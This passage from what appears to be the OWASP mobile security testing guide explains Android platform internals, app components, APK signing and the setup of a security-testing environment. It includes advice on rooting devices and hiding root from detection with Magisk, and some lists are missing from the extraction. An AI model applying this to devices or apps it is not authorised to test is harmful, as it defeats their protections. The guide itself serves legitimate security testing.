drwx------ 4 u0_a97 u0_a97 4096 2017-01-18 14:27 com.android.calendar\ndrwx------ 6 u0_a120 u0_a120 4096 2017-01-19 12:54 com.android.chrome\n
Developers who want their apps to share a common sandbox can sidestep sandboxing. When two apps are signed with the same certificate and explicitly share the same user ID (having the sharedUserId in their AndroidManifest.xml files), each can access the other's data directory. See the following example to achieve this in the NFC app:
<manifest xmlns:android=\"http://schemas.android.com/apk/res/android\"\n package=\"com.android.nfc\"\n android:sharedUserId=\"android.uid.nfc\">\n
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#linux-user-management","title":"Linux User Management","text":"Android leverages Linux user management to isolate apps. This approach is different from user management usage in traditional Linux environments, where multiple apps are often run by the same user. Android creates a unique UID for each Android app and runs the app in a separate process. Consequently, each app can access its own resources only. This protection is enforced by the Linux kernel.
Generally, apps are assigned UIDs in the range of 10000 to 99999. Android apps receive a user name based on their UID. For example, the app with UID 10188 receives the user name u0_a188
. If the permissions an app requested are granted, the corresponding group ID is added to the app's process. For example, the user ID of the app below is 10188. It belongs to the group ID 3003 (inet). That group is related to android.permission.INTERNET permission. The output of the id
command is shown below.
$ id\nuid=10188(u0_a188) gid=10188(u0_a188) groups=10188(u0_a188),3003(inet),\n9997(everybody),50188(all_a188) context=u:r:untrusted_app:s0:c512,c768\n
The relationship between group IDs and permissions is defined in the following file:
frameworks/base/data/etc/platform.xml
<permission name=\"android.permission.INTERNET\" >\n <group gid=\"inet\" />\n</permission>\n\n<permission name=\"android.permission.READ_LOGS\" >\n <group gid=\"log\" />\n</permission>\n\n<permission name=\"android.permission.WRITE_MEDIA_STORAGE\" >\n <group gid=\"media_rw\" />\n <group gid=\"sdcard_rw\" />\n</permission>\n
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#zygote","title":"Zygote","text":"The process Zygote
starts up during Android initialization. Zygote is a system service for launching apps. The Zygote process is a \"base\" process that contains all the core libraries the app needs. Upon launch, Zygote opens the socket /dev/socket/zygote
and listens for connections from local clients. When it receives a connection, it forks a new process, which then loads and executes the app-specific code.
In Android, the lifetime of an app process is controlled by the operating system. A new Linux process is created when an app component is started and the same app doesn\u2019t yet have any other components running. Android may kill this process when the latter is no longer necessary or when reclaiming memory is necessary to run more important apps. The decision to kill a process is primarily related to the state of the user's interaction with the process. In general, processes can be in one of four states.
A visible process is a process that the user is aware of, so killing it would have a noticeable negative impact on user experience. One example is running an activity that's visible to the user on-screen but not in the foreground.
A service process is a process hosting a service that has been started with the startService
method. Though these processes aren't directly visible to the user, they are generally things that the user cares about (such as background network data upload or download), so the system will always keep such processes running unless there's insufficient memory to retain all foreground and visible processes.
onCreate
handler is called when the app process is first created. Other callback methods include onLowMemory
, onTrimMemory
and onConfigurationChanged
.Android applications can be shipped in two forms: the Android Package Kit (APK) file or an Android App Bundle (.aab). Android App Bundles provide all the resources necessary for an app, but defer the generation of the APK and its signing to Google Play. App Bundles are signed binaries which contain the code of the app in several modules. The base module contains the core of the application. The base module can be extended with various modules which contain new enrichments/functionalities for the app as further explained on the developer documentation for app bundle. If you have an Android App Bundle, you can best use the bundletool command line tool from Google to build unsigned APKs in order to use the existing tooling on the APK. You can create an APK from an AAB file by running the following command:
bundletool build-apks --bundle=/MyApp/my_app.aab --output=/MyApp/my_app.apks\n
If you want to create signed APKs ready for deployment to a test device, use:
$ bundletool build-apks --bundle=/MyApp/my_app.aab --output=/MyApp/my_app.apks\n--ks=/MyApp/keystore.jks\n--ks-pass=file:/MyApp/keystore.pwd\n--ks-key-alias=MyKeyAlias\n--key-pass=file:/MyApp/key.pwd\n
We recommend that you test both the APK with and without the additional modules, so that it becomes clear whether the additional modules introduce and/or fix security issues for the base module.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#android-manifest","title":"Android Manifest","text":"Every app has an Android Manifest file, which embeds content in binary XML format. The standard name of this file is AndroidManifest.xml. It is located in the root directory of the app\u2019s Android Package Kit (APK) file.
The manifest file describes the app structure, its components (activities, services, content providers, and intent receivers), and requested permissions. It also contains general app metadata, such as the app's icon, version number, and theme. The file may list other information, such as compatible APIs (minimal, targeted, and maximal SDK version) and the kind of storage it can be installed on (external or internal).
Here is an example of a manifest file, including the package name (the convention is a reversed URL, but any string is acceptable). It also lists the app version, relevant SDKs, required permissions, exposed content providers, broadcast receivers used with intent filters and a description of the app and its activities:
<manifest\n package=\"com.owasp.myapplication\"\n android:versionCode=\"0.1\" >\n\n <uses-sdk android:minSdkVersion=\"12\"\n android:targetSdkVersion=\"22\"\n android:maxSdkVersion=\"25\" />\n\n <uses-permission android:name=\"android.permission.INTERNET\" />\n\n <provider\n android:name=\"com.owasp.myapplication.MyProvider\"\n android:exported=\"false\" />\n\n <receiver android:name=\".MyReceiver\" >\n <intent-filter>\n <action android:name=\"com.owasp.myapplication.myaction\" />\n </intent-filter>\n </receiver>\n\n <application\n android:icon=\"@drawable/ic_launcher\"\n android:label=\"@string/app_name\"\n android:theme=\"@style/Theme.Material.Light\" >\n <activity\n android:name=\"com.owasp.myapplication.MainActivity\" >\n <intent-filter>\n <action android:name=\"android.intent.action.MAIN\" />\n </intent-filter>\n </activity>\n </application>\n</manifest>\n
The full list of available manifest options is in the official Android Manifest file documentation.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#app-components","title":"App Components","text":"Android apps are made of several high-level components. The main components are:
All these elements are provided by the Android operating system, in the form of predefined classes available through APIs.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#activities","title":"Activities","text":"Activities make up the visible part of any app. There is one activity per screen, so an app with three different screens implements three different activities. Activities are declared by extending the Activity class. They contain all user interface elements: fragments, views, and layouts.
Each activity needs to be declared in the Android Manifest with the following syntax:
<activity android:name=\"ActivityName\">\n</activity>\n
Activities not declared in the manifest can't be displayed, and attempting to launch them will raise an exception.
Like apps, activities have their own life cycle and need to monitor system changes to handle them. Activities can be in the following states: active, paused, stopped, and inactive. These states are managed by the Android operating system. Accordingly, activities can implement the following event managers:
An app may not explicitly implement all event managers, in which case default actions are taken. Typically, at least the onCreate
manager is overridden by the app developers. This is how most user interface components are declared and initialized. onDestroy
may be overridden when resources (like network connections or connections to databases) must be explicitly released or specific actions must occur when the app shuts down.
A fragment represents a behavior or a portion of the user interface within the activity. Fragments were introduced in Android with version Honeycomb 3.0 (API level 11).
Fragments are meant to encapsulate parts of the interface to facilitate re-usability and adaptation to different screen sizes. Fragments are autonomous entities in that they include all their required components (they have their own layout, buttons, etc.). However, they must be integrated with activities to be useful: fragments can't exist on their own. They have their own life cycle, which is tied to the life cycle of the Activities that implement them.
Because fragments have their own life cycle, the Fragment class contains event managers that can be redefined and extended. These event managers include onAttach, onCreate, onStart, onDestroy and onDetach. Several others exist; the reader should refer to the Android Fragment specification for more details.
Fragments can be easily implemented by extending the Fragment class provided by Android:
Example in Java:
public class MyFragment extends Fragment {\n ...\n}\n
Example in Kotlin:
class MyFragment : Fragment() {\n ...\n}\n
Fragments don't need to be declared in manifest files because they depend on activities.
To manage its fragments, an activity can use a Fragment Manager (FragmentManager class). This class makes it easy to find, add, remove, and replace associated fragments.
Fragment Managers can be created via the following:
Example in Java:
FragmentManager fm = getFragmentManager();\n
Example in Kotlin:
var fm = fragmentManager\n
Fragments don't necessarily have a user interface; they can be a convenient and efficient way to manage background operations pertaining to the app's user interface. A fragment may be declared persistent so that the system preserves its state even if its Activity is destroyed.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#content-providers","title":"Content Providers","text":"Android uses SQLite to store data permanently: as with Linux, data is stored in files. SQLite is a light, efficient, open source relational data storage technology that does not require much processing power, which makes it ideal for mobile use. An entire API with specific classes (Cursor, ContentValues, SQLiteOpenHelper, ContentProvider, ContentResolver, etc.) is available. SQLite is not run as a separate process; it is part of the app. By default, a database belonging to a given app is accessible to this app only. However, content providers offer a great mechanism for abstracting data sources (including databases and flat files); they also provide a standard and efficient mechanism to share data between apps, including native apps. To be accessible to other apps, a content provider needs to be explicitly declared in the manifest file of the app that will share it. As long as content providers aren't declared, they won't be exported and can only be called by the app that creates them.
Content providers are implemented through a URI addressing scheme: they all use the content:// model. Regardless of the type of sources (SQLite database, flat file, etc.), the addressing scheme is always the same, thereby abstracting the sources and offering the developer a unique scheme. Content providers offer all regular database operations: create, read, update, delete. That means that any app with proper rights in its manifest file can manipulate the data from other apps.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#services","title":"Services","text":"Services are Android OS components (based on the Service class) that perform tasks in the background (data processing, starting intents, and notifications, etc.) without presenting a user interface. Services are meant to run processes long-term. Their system priorities are lower than those of active apps and higher than those of inactive apps. Therefore, they are less likely to be killed when the system needs resources, and they can be configured to automatically restart when enough resources become available. This makes services a great candidate for running background tasks. Please note that Services, like Activities, are executed in the main app thread. A service does not create its own thread and does not run in a separate process unless you specify otherwise.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#inter-process-communication","title":"Inter-Process Communication","text":"As we've already learned, every Android process has its own sandboxed address space. Inter-process communication facilities allow apps to exchange signals and data securely. Instead of relying on the default Linux IPC facilities, Android's IPC is based on Binder, a custom implementation of OpenBinder. Most Android system services and all high-level IPC services depend on Binder.
The term Binder stands for a lot of different things, including:
The Binder framework includes a client-server communication model. To use IPC, apps call IPC methods in proxy objects. The proxy objects transparently marshall the call parameters into a parcel and send a transaction to the Binder server, which is implemented as a character driver (/dev/binder). The server holds a thread pool for handling incoming requests and delivers messages to the destination object. From the perspective of the client app, all of this seems like a regular method call, all the heavy lifting is done by the Binder framework.
Services that allow other applications to bind to them are called bound services. These services must provide an IBinder interface to clients. Developers use the Android Interface Descriptor Language (AIDL) to write interfaces for remote services.
ServiceManager is a system daemon that manages the registration and lookup of system services. It maintains a list of name/Binder pairs for all registered services. Services are added with addService
and retrieved by name with the static getService
method in android.os.ServiceManager
:
Example in Java:
public static IBinder getService(String name) {\n try {\n IBinder service = sCache.get(name);\n if (service != null) {\n return service;\n } else {\n return getIServiceManager().getService(name);\n }\n } catch (RemoteException e) {\n Log.e(TAG, \"error in getService\", e);\n }\n return null;\n }\n
Example in Kotlin:
companion object {\n private val sCache: Map<String, IBinder> = ArrayMap()\n fun getService(name: String): IBinder? {\n try {\n val service = sCache[name]\n return service ?: getIServiceManager().getService(name)\n } catch (e: RemoteException) {\n Log.e(FragmentActivity.TAG, \"error in getService\", e)\n }\n return null\n }\n }\n
You can query the list of system services with the service list
command.
$ adb shell service list\nFound 99 services:\n0 carrier_config: [com.android.internal.telephony.ICarrierConfigLoader]\n1 phone: [com.android.internal.telephony.ITelephony]\n2 isms: [com.android.internal.telephony.ISms]\n3 iphonesubinfo: [com.android.internal.telephony.IPhoneSubInfo]\n
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#intents","title":"Intents","text":"Intent messaging is an asynchronous communication framework built on top of Binder. This framework allows both point-to-point and publish-subscribe messaging. An Intent is a messaging object that can be used to request an action from another app component. Although intents facilitate inter-component communication in several ways, there are three fundamental use cases:
startActivity
. The intent describes the activity and carries necessary data.sendBroadcast
or sendOrderedBroadcast
.There are two types of intents. Explicit intents name the component that will be started (the fully qualified class name). For instance:
Example in Java:
Intent intent = new Intent(this, myActivity.myClass);\n
Example in Kotlin:
var intent = Intent(this, myActivity.myClass)\n
Implicit intents are sent to the OS to perform a given action on a given set of data (The URL of the OWASP website in our example below). It is up to the system to decide which app or class will perform the corresponding service. For instance:
Example in Java:
Intent intent = new Intent(Intent.MY_ACTION, Uri.parse(\"https://www.owasp.org\"));\n
Example in Kotlin:
var intent = Intent(Intent.MY_ACTION, Uri.parse(\"https://www.owasp.org\"))\n
An intent filter is an expression in Android Manifest files that specifies the type of intents the component would like to receive. For instance, by declaring an intent filter for an activity, you make it possible for other apps to directly start your activity with a certain kind of intent. Likewise, your activity can only be started with an explicit intent if you don't declare any intent filters for it.
Android uses intents to broadcast messages to apps (such as an incoming call or SMS) important power supply information (low battery, for example), and network changes (loss of connection, for instance). Extra data may be added to intents (through putExtra
/getExtras
).
Here is a short list of intents sent by the operating system. All constants are defined in the Intent class, and the whole list is in the official Android documentation:
To improve security and privacy, a Local Broadcast Manager is used to send and receive intents within an app without having them sent to the rest of the operating system. This is very useful for ensuring that sensitive and private data don't leave the app perimeter (geolocation data for instance).
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#broadcast-receivers","title":"Broadcast Receivers","text":"Broadcast Receivers are components that allow apps to receive notifications from other apps and from the system itself. With them, apps can react to events (internal, initiated by other apps, or initiated by the operating system). They are generally used to update user interfaces, start services, update content, and create user notifications.
There are two ways to make a Broadcast Receiver known to the system. One way is to declare it in the Android Manifest file. The manifest should specify an association between the Broadcast Receiver and an intent filter to indicate the actions the receiver is meant to listen for.
An example Broadcast Receiver declaration with an intent filter in a manifest:
<receiver android:name=\".MyReceiver\" >\n <intent-filter>\n <action android:name=\"com.owasp.myapplication.MY_ACTION\" />\n </intent-filter>\n</receiver>\n
Please note that in this example, the Broadcast Receiver does not include the android:exported
attribute. As at least one filter was defined, the default value will be set to \"true\". In the absence of any filters, it will be set to \"false\".
The other way is to create the receiver dynamically in code. The receiver can then register with the method Context.registerReceiver
.
An example of registering a Broadcast Receiver dynamically:
Example in Java:
// Define a broadcast receiver\nBroadcastReceiver myReceiver = new BroadcastReceiver() {\n @Override\n public void onReceive(Context context, Intent intent) {\n Log.d(TAG, \"Intent received by myReceiver\");\n }\n};\n// Define an intent filter with actions that the broadcast receiver listens for\nIntentFilter intentFilter = new IntentFilter();\nintentFilter.addAction(\"com.owasp.myapplication.MY_ACTION\");\n// To register the broadcast receiver\nregisterReceiver(myReceiver, intentFilter);\n// To un-register the broadcast receiver\nunregisterReceiver(myReceiver);\n
Example in Kotlin:
// Define a broadcast receiver\nval myReceiver: BroadcastReceiver = object : BroadcastReceiver() {\n override fun onReceive(context: Context, intent: Intent) {\n Log.d(FragmentActivity.TAG, \"Intent received by myReceiver\")\n }\n}\n// Define an intent filter with actions that the broadcast receiver listens for\nval intentFilter = IntentFilter()\nintentFilter.addAction(\"com.owasp.myapplication.MY_ACTION\")\n// To register the broadcast receiver\nregisterReceiver(myReceiver, intentFilter)\n// To un-register the broadcast receiver\nunregisterReceiver(myReceiver)\n
Note that the system starts an app with the registered receiver automatically when a relevant intent is raised.
According to Broadcasts Overview, a broadcast is considered \"implicit\" if it does not target an app specifically. After receiving an implicit broadcast, Android will list all apps that have registered a given action in their filters. If more than one app has registered for the same action, Android will prompt the user to select from the list of available apps.
An interesting feature of Broadcast Receivers is that they can be prioritized; this way, an intent will be delivered to all authorized receivers according to their priority. A priority can be assigned to an intent filter in the manifest via the android:priority
attribute as well as programmatically via the IntentFilter.setPriority
method. However, note that receivers with the same priority will be run in an arbitrary order.
If your app is not supposed to send broadcasts across apps, use a Local Broadcast Manager (LocalBroadcastManager
). They can be used to make sure intents are received from the internal app only, and any intent from any other app will be discarded. This is very useful for improving security and the efficiency of the app, as no interprocess communication is involved. However, please note that the LocalBroadcastManager
class is deprecated and Google recommends using alternatives such as LiveData
.
For more security considerations regarding Broadcast Receiver, see Security Considerations and Best Practices.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#implicit-broadcast-receiver-limitation","title":"Implicit Broadcast Receiver Limitation","text":"According to Background Optimizations, apps targeting Android 7.0 (API level 24) or higher no longer receive CONNECTIVITY_ACTION
broadcast unless they register their Broadcast Receivers with Context.registerReceiver()
. The system does not send ACTION_NEW_PICTURE
and ACTION_NEW_VIDEO
broadcasts as well.
According to Background Execution Limits, apps that target Android 8.0 (API level 26) or higher can no longer register Broadcast Receivers for implicit broadcasts in their manifest, except for those listed in Implicit Broadcast Exceptions. The Broadcast Receivers created at runtime by calling Context.registerReceiver
are not affected by this limitation.
According to Changes to System Broadcasts, beginning with Android 9 (API level 28), the NETWORK_STATE_CHANGED_ACTION
broadcast doesn't receive information about the user's location or personally identifiable data.
Once an app has been successfully developed, the next step is to publish and share it with others. However, apps can't simply be added to a store and shared, they must be first signed. The cryptographic signature serves as a verifiable mark placed by the developer of the app. It identifies the app\u2019s author and ensures that the app has not been modified since its initial distribution.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#signing-process","title":"Signing Process","text":"During development, apps are signed with an automatically generated certificate. This certificate is inherently insecure and is for debugging only. Most stores don't accept this kind of certificate for publishing; therefore, a certificate with more secure features must be created. When an application is installed on the Android device, the Package Manager ensures that it has been signed with the certificate included in the corresponding APK. If the certificate's public key matches the key used to sign any other APK on the device, the new APK may share a UID with the pre-existing APK. This facilitates interactions between applications from a single vendor. Alternatively, specifying security permissions for the Signature protection level is possible; this will restrict access to applications that have been signed with the same key.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#apk-signing-schemes","title":"APK Signing Schemes","text":"Android supports three application signing schemes. Starting with Android 9 (API level 28), APKs can be verified with APK Signature Scheme v3 (v3 scheme), APK Signature Scheme v2 (v2 scheme) or JAR signing (v1 scheme). For Android 7.0 (API level 24) and above, APKs can be verified with the APK Signature Scheme v2 (v2 scheme) or JAR signing (v1 scheme). For backwards compatibility, an APK can be signed with multiple signature schemes in order to make the app run on both newer and older SDK versions. Older platforms ignore v2 signatures and verify v1 signatures only.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#jar-signing-v1-scheme","title":"JAR Signing (v1 Scheme)","text":"The original version of app signing implements the signed APK as a standard signed JAR, which must contain all the entries in META-INF/MANIFEST.MF
. All files must be signed with a common certificate. This scheme does not protect some parts of the APK, such as ZIP metadata. The drawback of this scheme is that the APK verifier needs to process untrusted data structures before applying the signature, and the verifier discards data the data structures don't cover. Also, the APK verifier must decompress all compressed files, which takes considerable time and memory.
With the APK signature scheme, the complete APK is hashed and signed, and an APK Signing Block is created and inserted into the APK. During validation, the v2 scheme checks the signatures of the entire APK file. This form of APK verification is faster and offers more comprehensive protection against modification. You can see the APK signature verification process for v2 Scheme below.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#apk-signature-scheme-v3-scheme","title":"APK Signature Scheme (v3 Scheme)","text":"The v3 APK Signing Block format is the same as v2. V3 adds information about the supported SDK versions and a proof-of-rotation struct to the APK signing block. In Android 9 (API level 28) and higher, APKs can be verified according to APK Signature Scheme v3, v2 or v1 scheme. Older platforms ignore v3 signatures and try to verify v2 then v1 signature.
The proof-of-rotation attribute in the signed-data of the signing block consists of a singly-linked list, with each node containing a signing certificate used to sign previous versions of the app. To make backward compatibility work, the old signing certificates sign the new set of certificates, thus providing each new key with evidence that it should be as trusted as the older key(s). It is no longer possible to sign APKs independently, because the proof-of-rotation structure must have the old signing certificates signing the new set of certificates, rather than signing them one-by-one. You can see the APK signature v3 scheme verification process below.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#apk-signature-scheme-v4-scheme","title":"APK Signature Scheme (v4 Scheme)","text":"The APK Signature Scheme v4 was introduced along with Android 11 (API level 30) and requires all devices launched with Android 11 and up to have fs-verity enabled by default. fs-verity is a Linux kernel feature that is primarily used for file authentication (detection of malicious modifications) due to its extremely efficient file hash calculation. Read requests will only succeed if the content verifies against trusted digital certificates that were loaded to the kernel keyring during boot time.
The v4 signature requires a complementary v2 or v3 signature and in contrast to previous signature schemes, the v4 signature is stored in a separate file <apk name>.apk.idsig
. Remember to specify it using the --v4-signature-file
flag when verifying a v4-signed APK with apksigner verify
.
You can find more detailed information in the Android developer documentation.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#creating-your-certificate","title":"Creating Your Certificate","text":"Android uses public/private certificates to sign Android apps (.apk files). Certificates are bundles of information; in terms of security, keys are the most important part of that bundle. Public certificates contain users' public keys, and private certificates contain users' private keys. Public and private certificates are linked. Certificates are unique and can't be re-generated. Note that if a certificate is lost, it cannot be recovered, so updating any apps signed with that certificate becomes impossible. App creators can either reuse an existing private/public key pair that is in an available KeyStore or generate a new pair. In the Android SDK, a new key pair is generated with the keytool
command. The following command creates a RSA key pair with a key length of 2048 bits and an expiry time of 7300 days = 20 years. The generated key pair is stored in the file 'myKeyStore.jks', which is in the current directory:
keytool -genkey -alias myDomain -keyalg RSA -keysize 2048 -validity 7300 -keystore myKeyStore.jks -storepass myStrongPassword\n
Safely storing your secret key and making sure it remains secret during its entire life cycle is of paramount importance. Anyone who gains access to the key will be able to publish updates to your apps with content that you don't control (thereby adding insecure features or accessing shared content with signature-based permissions). The trust that a user places in an app and its developers is based totally on such certificates; certificate protection and secure management are therefore vital for reputation and customer retention, and secret keys must never be shared with other individuals. Keys are stored in a binary file that can be protected with a password; such files are referred to as KeyStores. KeyStore passwords should be strong and known only to the key creator. For this reason, keys are usually stored on a dedicated build machine that developers have limited access to. An Android certificate must have a validity period that's longer than that of the associated app (including updated versions of the app). For example, Google Play will require certificates to remain valid until Oct 22nd, 2033 at least.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#signing-an-application","title":"Signing an Application","text":"The goal of the signing process is to associate the app file (.apk) with the developer's public key. To achieve this, the developer calculates a hash of the APK file and encrypts it with their own private key. Third parties can then verify the app's authenticity (e.g., the fact that the app really comes from the user who claims to be the originator) by decrypting the encrypted hash with the author\u2019s public key and verifying that it matches the actual hash of the APK file.
Many Integrated Development Environments (IDE) integrate the app signing process to make it easier for the user. Be aware that some IDEs store private keys in clear text in configuration files; double-check this in case others are able to access such files and remove the information if necessary. Apps can be signed from the command line with the 'apksigner' tool provided by the Android SDK (API level 24 and higher). It is located at [SDK-Path]/build-tools/[version]
. For API 24.0.2 and below, you can use 'jarsigner', which is part of the Java JDK. Details about the whole process can be found in official Android documentation; however, an example is given below to illustrate the point.
apksigner sign --out mySignedApp.apk --ks myKeyStore.jks myUnsignedApp.apk\n
In this example, an unsigned app ('myUnsignedApp.apk') will be signed with a private key from the developer KeyStore 'myKeyStore.jks' (located in the current directory). The app will become a signed app called 'mySignedApp.apk' and will be ready to release to stores.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#zipalign","title":"Zipalign","text":"The zipalign
tool should always be used to align the APK file before distribution. This tool aligns all uncompressed data (such as images, raw files, and 4-byte boundaries) within the APK, which helps improve memory management during app runtime.
Zipalign must be used before the APK file is signed with apksigner.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#publishing-process","title":"Publishing Process","text":"Distributing apps from anywhere (your own site, any store, etc.) is possible because the Android ecosystem is open. However, Google Play is the most well-known, trusted, and popular store, and Google itself provides it. Amazon Appstore is the trusted default store for Kindle devices. If users want to install third-party apps from a non-trusted source, they must explicitly allow this with their device security settings.
Apps can be installed on an Android device from a variety of sources: locally via USB, via Google's official app store (Google Play Store) or from alternative stores.
Whereas other vendors may review and approve apps before they are actually published, Google will simply scan for known malware signatures; this minimizes the time between the beginning of the publishing process and public app availability.
Publishing an app is quite straightforward; the main operation is making the signed APK file downloadable. On Google Play, publishing starts with account creation and is followed by app delivery through a dedicated interface. Details are available at the official Android documentation.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/","title":"Android Security Testing","text":"In this chapter, we'll dive into setting up a security testing environment and introduce you to some practical processes and techniques for testing the security of Android apps. These are the building blocks for the MASTG test cases.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#android-testing-setup","title":"Android Testing Setup","text":"You can set up a fully functioning test environment on almost any machine running Windows, Linux, or macOS.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#host-device","title":"Host Device","text":"At the very least, you'll need Android Studio (which comes with the Android SDK) platform tools, an emulator, and an app to manage the various SDK versions and framework components. Android Studio also comes with an Android Virtual Device (AVD) Manager application for creating emulator images. Make sure that the newest SDK tools and platform tools packages are installed on your system.
In addition, you may want to complete your host setup by installing the Android NDK if you're planning to work with apps containing native libraries.
Sometimes it can be useful to display or control devices from the computer. To achieve this, you can use Scrcpy.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#testing-device","title":"Testing Device","text":"For dynamic analysis, you'll need an Android device to run the target app on. In principle, you can test without a real Android device and use only the emulator. However, apps execute quite slowly on a emulator, and simulators may not give realistic results. Testing on a real device makes for a smoother process and a more realistic environment. On the other hand, emulators allow you to easily change SDK versions or create multiple devices. A full overview of the pros and cons of each approach is listed in the table below.
Property Physical Emulator/Simulator Ability to restore Softbricks are always possible, but new firmware can typically still be flashed. Hardbricks are very rare. Emulators can crash or become corrupt, but a new one can be created or a snapshot can be restored. Reset Can be restored to factory settings or reflashed. Emulators can be deleted and recreated. Snapshots Not possible. Supported, great for malware analysis. Speed Much faster than emulators. Typically slow, but improvements are being made. Cost Typically start at $200 for a usable device. You may require different devices, such as one with or without a biometric sensor. Both free and commercial solutions exist. Ease of rooting Highly dependent on the device. Typically rooted by default. Ease of emulator detection It's not an emulator, so emulator checks are not applicable. Many artefacts will exist, making it easy to detect that the app is running in an emulator. Ease of root detection Easier to hide root, as many root detection algorithms check for emulator properties. With Magisk Systemless root it's nearly impossible to detect. Emulators will almost always trigger root detection algorithms due to the fact that they are built for testing with many artefacts that can be found. Hardware interaction Easy interaction through Bluetooth, NFC, 4G, Wi-Fi, biometrics, camera, GPS, gyroscope, ... Usually fairly limited, with emulated hardware input (e.g. random GPS coordinates) API level support Depends on the device and the community. Active communities will keep distributing updated versions (e.g. LineageOS), while less popular devices may only receive a few updates. Switching between versions requires flashing the device, a tedious process. Always supports the latest versions, including beta releases. Emulators containing specific API levels can easily be downloaded and launched. Native library support Native libraries are usually built for ARM devices, so they will work on a physical device. 
Some emulators run on x86 CPUs, so they may not be able to run packaged native libraries. Malware danger Malware samples can infect a device, but if you can clear out the device storage and flash a clean firmware, thereby restoring it to factory settings, this should not be a problem. Be aware that there are malware samples that try to exploit the USB bridge. Malware samples can infect an emulator, but the emulator can simply be removed and recreated. It is also possible to create snapshots and compare different snapshots to help in malware analysis. Be aware that there are malware proofs of concept which try to attack the hypervisor."},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#testing-on-a-real-device","title":"Testing on a Real Device","text":"Almost any physical device can be used for testing, but there are a few considerations to be made. First, the device needs to be rootable. This is typically either done through an exploit, or through an unlocked bootloader. Exploits are not always available, and the bootloader may be locked permanently, or it may only be unlocked once the carrier contract has been terminated.
The best candidates are flagship Google Pixel devices built for developers. These devices typically come with an unlockable bootloader, open source firmware, kernel, radio available online and official OS source code. The developer communities prefer Google devices as the OS is closest to the Android Open Source Project. These devices generally have the longest support windows with 2 years of OS updates and 1 year of security updates after that.
Alternatively, Google's Android One project contains devices that will receive the same support windows (2 years of OS updates, 1 year of security updates) and have near-stock experiences. While it was originally started as a project for low-end devices, the program has evolved to include mid-range and high-end smartphones, many of which are actively supported by the modding community.
Devices that are supported by the LineageOS project are also very good candidates for test devices. They have an active community, easy to follow flashing and rooting instructions and the latest Android versions are typically quickly available as a Lineage installation. LineageOS also continues support for new Android versions long after the OEM has stopped distributing updates.
When working with an Android physical device, you'll want to enable Developer Mode and USB debugging on the device in order to use the ADB debugging interface. Since Android 4.2 (API level 16), the Developer options sub menu in the Settings app is hidden by default. To activate it, tap the Build number section of the About phone view seven times. Note that the build number field's location varies slightly by device. For example, on LG Phones, it is under About phone -> Software information. Once you have done this, Developer options will be shown at bottom of the Settings menu. Once developer options are activated, you can enable debugging with the USB debugging switch.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#testing-on-an-emulator","title":"Testing on an Emulator","text":"Multiple emulators exist, once again with their own strengths and weaknesses:
Free emulators:
Commercial emulators:
Although there exist several free Android emulators, we recommend using AVD as it provides enhanced features appropriate for testing your app compared to the others. In the remainder of this guide, we will use the official AVD to perform tests.
AVD supports some hardware emulation, such as GPS or SMS through its so-called Extended Controls as well as motion sensors.
You can either start an Android Virtual Device (AVD) by using the AVD Manager in Android Studio or start the AVD manager from the command line with the android
command, which is found in the tools directory of the Android SDK:
./android avd\n
Several tools and VMs that can be used to test an app within an emulator environment are available:
Please also verify the \"Testing Tools\" chapter at the end of this book.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#getting-privileged-access","title":"Getting Privileged Access","text":"Rooting (i.e., modifying the OS so that you can run commands as the root user) is recommended for testing on a real device. This gives you full control over the operating system and allows you to bypass restrictions such as app sandboxing. These privileges in turn allow you to use techniques like code injection and function hooking more easily.
Note that rooting is risky, and three main consequences need to be clarified before you proceed. Rooting can have the following negative effects:
You should not root a personal device that you store your private information on. We recommend getting a cheap, dedicated test device instead. Many older devices, such as Google's Nexus series, can run the newest Android versions and are perfectly fine for testing.
You need to understand that rooting your device is ultimately YOUR decision and that OWASP shall in no way be held responsible for any damage. If you're uncertain, seek expert advice before starting the rooting process.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#which-mobiles-can-be-rooted","title":"Which Mobiles Can Be Rooted","text":"Virtually any Android mobile can be rooted. Commercial versions of Android OS (which are Linux OS evolutions at the kernel level) are optimized for the mobile world. Some features have been removed or disabled for these versions, for example, non-privileged users' ability to become the 'root' user (who has elevated privileges). Rooting a phone means allowing users to become the root user, e.g., adding a standard Linux executable called su
, which is used to change to another user account.
To root a mobile device, first unlock its boot loader. The unlocking procedure depends on the device manufacturer. However, for practical reasons, rooting some mobile devices is more popular than rooting others, particularly when it comes to security testing: devices created by Google and manufactured by companies like Samsung, LG, and Motorola are among the most popular, particularly because they are used by many developers. The device warranty is not nullified when the boot loader is unlocked and Google provides many tools to support the root itself.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#rooting-with-magisk","title":"Rooting with Magisk","text":"Magisk (\"Magic Mask\") is one way to root your Android device. Its specialty lies in the way the modifications on the system are performed. While other rooting tools alter the actual data on the system partition, Magisk does not (which is called \"systemless\"). This enables a way to hide the modifications from root-sensitive applications (e.g. for banking or games) and allows using the official Android OTA upgrades without the need to unroot the device beforehand.
You can get familiar with Magisk reading the official documentation on GitHub. If you don't have Magisk installed, you can find installation instructions in the documentation. If you use an official Android version and plan to upgrade it, Magisk provides a tutorial on GitHub.
